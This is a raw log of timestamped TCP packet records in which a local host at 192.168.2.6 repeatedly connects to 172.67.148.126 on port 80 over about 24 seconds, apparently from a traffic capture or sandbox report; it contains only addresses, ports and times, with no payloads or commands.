                                                Apr 6, 2024 09:30:20.844234943 CEST4979380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:20.968045950 CEST8049793172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:20.968179941 CEST4979380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:20.970309973 CEST4979380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:21.094041109 CEST8049793172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:21.094136953 CEST4979380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:21.217803955 CEST8049793172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:21.460465908 CEST8049793172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:21.460719109 CEST8049793172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:21.460761070 CEST4979380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:21.460798979 CEST4979380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:21.584651947 CEST8049793172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:21.609075069 CEST4979480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:21.733210087 CEST8049794172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:21.733340979 CEST4979480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:21.735500097 CEST4979480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:21.859648943 CEST8049794172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:21.859711885 CEST4979480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:21.983899117 CEST8049794172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:22.237138033 CEST8049794172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:22.237330914 CEST4979480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:22.237360954 CEST8049794172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:22.237413883 CEST4979480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:22.361572981 CEST8049794172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:22.378374100 CEST4979580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:22.501840115 CEST8049795172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:22.501966953 CEST4979580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:22.504190922 CEST4979580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:22.627835989 CEST8049795172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:22.627902985 CEST4979580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:22.751507044 CEST8049795172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:23.013819933 CEST8049795172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:23.013947964 CEST4979580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:23.013999939 CEST8049795172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:23.014039040 CEST4979580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:23.137361050 CEST8049795172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:23.174083948 CEST4979680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:23.298655987 CEST8049796172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:23.298796892 CEST4979680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:23.301208019 CEST4979680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:23.425890923 CEST8049796172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:23.425993919 CEST4979680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:23.550468922 CEST8049796172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:23.815175056 CEST8049796172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:23.815342903 CEST4979680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:23.815705061 CEST8049796172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:23.815753937 CEST4979680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:23.939918041 CEST8049796172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:23.954077005 CEST4979780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:24.079646111 CEST8049797172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:24.079809904 CEST4979780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:24.081981897 CEST4979780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:24.206351042 CEST8049797172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:24.206535101 CEST4979780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:24.332076073 CEST8049797172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:24.592781067 CEST8049797172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:24.592894077 CEST4979780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:24.593024015 CEST8049797172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:24.593069077 CEST4979780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:24.717271090 CEST8049797172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:24.736130953 CEST4979880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:24.860332012 CEST8049798172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:24.860423088 CEST4979880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:24.862545967 CEST4979880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:24.986644030 CEST8049798172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:24.986743927 CEST4979880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:25.110795975 CEST8049798172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:25.372438908 CEST8049798172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:25.372597933 CEST8049798172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:25.372698069 CEST4979880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:25.372776985 CEST4979880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:25.496980906 CEST8049798172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:25.515328884 CEST4979980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:25.638861895 CEST8049799172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:25.639014959 CEST4979980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:25.641171932 CEST4979980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:25.764619112 CEST8049799172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:25.764785051 CEST4979980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:25.888334990 CEST8049799172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:26.148691893 CEST8049799172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:26.148840904 CEST4979980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:26.149518967 CEST8049799172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:26.149573088 CEST4979980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:26.272325993 CEST8049799172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:26.298290968 CEST4980080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:26.422525883 CEST8049800172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:26.422630072 CEST4980080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:26.424765110 CEST4980080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:26.548904896 CEST8049800172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:26.549029112 CEST4980080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:26.673949003 CEST8049800172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:26.935693026 CEST8049800172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:26.935798883 CEST8049800172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:26.935801029 CEST4980080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:26.935842037 CEST4980080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:27.059951067 CEST8049800172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:27.077133894 CEST4980180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:27.201174974 CEST8049801172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:27.201373100 CEST4980180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:27.203747034 CEST4980180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:27.327698946 CEST8049801172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:27.327763081 CEST4980180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:27.451694012 CEST8049801172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:27.716696978 CEST8049801172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:27.717015982 CEST8049801172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:27.717087030 CEST4980180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:27.717123032 CEST4980180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:27.841027975 CEST8049801172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:27.859169006 CEST4980280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:27.983885050 CEST8049802172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:27.983969927 CEST4980280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:27.986411095 CEST4980280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:28.110852003 CEST8049802172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:28.110934019 CEST4980280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:28.235358953 CEST8049802172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:28.497347116 CEST8049802172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:28.497505903 CEST4980280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:28.498051882 CEST8049802172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:28.498101950 CEST4980280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:28.622170925 CEST8049802172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:28.653531075 CEST4980380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:28.777417898 CEST8049803172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:28.777538061 CEST4980380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:28.779877901 CEST4980380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:28.903537035 CEST8049803172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:28.903769016 CEST4980380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:29.027790070 CEST8049803172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:29.282464981 CEST8049803172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:29.282593012 CEST4980380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:29.283452034 CEST8049803172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:29.283540010 CEST4980380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:29.407655954 CEST8049803172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:29.421494961 CEST4980480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:29.545325994 CEST8049804172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:29.545447111 CEST4980480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:29.547585964 CEST4980480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:29.671443939 CEST8049804172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:29.671602964 CEST4980480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:29.795556068 CEST8049804172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:30.060945988 CEST8049804172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:30.060966015 CEST8049804172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:30.061105013 CEST4980480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:30.061194897 CEST4980480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:30.185188055 CEST8049804172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:30.210575104 CEST4980580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:30.334973097 CEST8049805172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:30.335150003 CEST4980580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:30.339046955 CEST4980580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:30.463177919 CEST8049805172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:30.463284969 CEST4980580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:30.587558985 CEST8049805172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:30.831743002 CEST8049805172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:30.831943989 CEST4980580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:30.832175970 CEST8049805172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:30.832232952 CEST4980580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:30.956358910 CEST8049805172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:31.006457090 CEST4980680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:31.130639076 CEST8049806172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:31.130732059 CEST4980680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:31.133120060 CEST4980680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:31.257896900 CEST8049806172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:31.258110046 CEST4980680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:31.382184029 CEST8049806172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:31.641822100 CEST8049806172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:31.641983032 CEST8049806172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:31.642075062 CEST4980680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:31.642075062 CEST4980680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:31.766437054 CEST8049806172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:31.779946089 CEST4980780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:31.904097080 CEST8049807172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:31.904386044 CEST4980780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:31.907018900 CEST4980780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:32.031569004 CEST8049807172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:32.031678915 CEST4980780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:32.156002998 CEST8049807172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:32.410543919 CEST8049807172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:32.410608053 CEST8049807172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:32.410698891 CEST4980780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:32.415286064 CEST4980780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:32.539597034 CEST8049807172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:32.545986891 CEST4980880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:32.670665026 CEST8049808172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:32.670768976 CEST4980880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:32.673177958 CEST4980880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:32.797804117 CEST8049808172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:32.797943115 CEST4980880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:32.922580004 CEST8049808172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:33.166218042 CEST8049808172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:33.166414022 CEST8049808172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:33.173615932 CEST4980880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:33.174376011 CEST4980880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:33.299592972 CEST8049808172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:33.311635971 CEST4980980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:33.435442924 CEST8049809172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:33.435586929 CEST4980980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:33.437851906 CEST4980980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:33.561779976 CEST8049809172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:33.561880112 CEST4980980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:33.685776949 CEST8049809172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:33.930989027 CEST8049809172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:33.931010962 CEST8049809172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:33.931191921 CEST4980980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:33.931296110 CEST4980980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:34.055574894 CEST8049809172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:34.077178955 CEST4981080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:34.201453924 CEST8049810172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:34.201560020 CEST4981080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:34.204191923 CEST4981080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:34.328246117 CEST8049810172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:34.328361988 CEST4981080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:34.452722073 CEST8049810172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:34.696522951 CEST8049810172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:34.696715117 CEST4981080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:34.696742058 CEST8049810172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:34.696814060 CEST4981080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:34.821746111 CEST8049810172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:34.849395037 CEST4981180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:34.973257065 CEST8049811172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:34.973357916 CEST4981180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:34.975531101 CEST4981180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:35.099325895 CEST8049811172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:35.099447966 CEST4981180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:35.223535061 CEST8049811172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:35.472255945 CEST8049811172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:35.472476006 CEST4981180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:35.473007917 CEST8049811172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:35.473076105 CEST4981180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:35.596579075 CEST8049811172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:35.606564045 CEST4981280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:35.730777025 CEST8049812172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:35.730906963 CEST4981280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:35.733011007 CEST4981280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:35.856702089 CEST8049812172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:35.856803894 CEST4981280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:35.980560064 CEST8049812172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:36.246402025 CEST8049812172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:36.246582031 CEST4981280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:36.246711969 CEST8049812172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:36.246759892 CEST4981280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:36.370281935 CEST8049812172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:36.390377998 CEST4981480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:36.514257908 CEST8049814172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:36.514352083 CEST4981480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:36.516498089 CEST4981480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:36.640285015 CEST8049814172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:36.640357971 CEST4981480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:36.764275074 CEST8049814172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:37.034734964 CEST8049814172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:37.034841061 CEST4981480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:37.035075903 CEST8049814172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:37.035121918 CEST4981480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:37.158718109 CEST8049814172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:37.177728891 CEST4981580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:37.302972078 CEST8049815172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:37.303078890 CEST4981580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:37.305241108 CEST4981580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:37.429336071 CEST8049815172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:37.429423094 CEST4981580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:37.553621054 CEST8049815172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:37.815327883 CEST8049815172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:37.815438986 CEST4981580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:37.815612078 CEST8049815172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:37.815660954 CEST4981580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:37.939649105 CEST8049815172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:37.960941076 CEST4981680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:38.085809946 CEST8049816172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:38.085903883 CEST4981680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:38.088059902 CEST4981680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:38.211796999 CEST8049816172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:38.212032080 CEST4981680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:38.336040974 CEST8049816172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:38.584656000 CEST8049816172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:38.584834099 CEST8049816172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:38.584839106 CEST4981680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:38.584878922 CEST4981680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:38.708559990 CEST8049816172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:38.735029936 CEST4981880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:38.859205008 CEST8049818172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:38.859316111 CEST4981880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:38.861510038 CEST4981880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:38.985665083 CEST8049818172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:38.985732079 CEST4981880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:39.110068083 CEST8049818172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:39.373178959 CEST8049818172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:39.373356104 CEST8049818172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:39.373424053 CEST4981880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:39.424190044 CEST4981880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:39.548429966 CEST8049818172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:39.560051918 CEST4981980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:39.684613943 CEST8049819172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:39.684708118 CEST4981980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:39.686953068 CEST4981980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:39.810956955 CEST8049819172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:39.811068058 CEST4981980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:39.935753107 CEST8049819172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:40.186532974 CEST8049819172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:40.187047005 CEST8049819172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:40.187160969 CEST4981980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:40.187199116 CEST4981980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:40.311455965 CEST8049819172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:41.838639975 CEST4982080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:41.964102030 CEST8049820172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:41.964200974 CEST4982080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:41.966392994 CEST4982080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:42.092077971 CEST8049820172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:42.092147112 CEST4982080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:42.217899084 CEST8049820172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:42.459868908 CEST8049820172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:42.460073948 CEST4982080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:42.460437059 CEST8049820172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:42.460484982 CEST4982080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:42.584270000 CEST8049820172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:42.609497070 CEST4982180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:42.734188080 CEST8049821172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:42.734335899 CEST4982180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:42.736556053 CEST4982180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:42.860680103 CEST8049821172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:42.860810995 CEST4982180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:42.985167980 CEST8049821172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:43.230144024 CEST8049821172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:43.230164051 CEST8049821172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:43.230218887 CEST4982180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:43.230245113 CEST4982180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:43.355782032 CEST8049821172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:43.375700951 CEST4982280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:43.501344919 CEST8049822172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:43.501458883 CEST4982280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:43.503602982 CEST4982280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:43.627646923 CEST8049822172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:43.627749920 CEST4982280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:43.751894951 CEST8049822172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:43.994375944 CEST8049822172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:43.994505882 CEST8049822172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:43.994529963 CEST4982280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:43.994565010 CEST4982280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:44.118913889 CEST8049822172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:44.141845942 CEST4982380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:44.267196894 CEST8049823172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:44.267332077 CEST4982380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:44.269499063 CEST4982380192.168.2.6172.67.148.126
